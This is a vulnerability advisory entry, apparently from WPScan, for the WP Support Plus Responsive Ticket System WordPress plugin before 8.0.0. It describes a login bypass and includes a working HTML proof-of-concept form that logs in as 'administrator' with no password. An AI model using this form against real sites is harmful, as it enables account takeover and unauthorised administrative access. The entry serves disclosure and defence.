WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation



Description
You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
Proof of Concept
<form method="post" action="http://example.com/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="administrator">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Affects Plugin

References

PacketStorm 140413
URL https://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html

Classification

Type PRIVESC
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-269

Miscellaneous

Views 864
Verified No
WPVDB ID 10119

Timeline

Publicly Published 2017-08-01 (almost 3 years ago)
Added 2020-03-08 (4 months ago)
Last Updated 2020-03-09 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin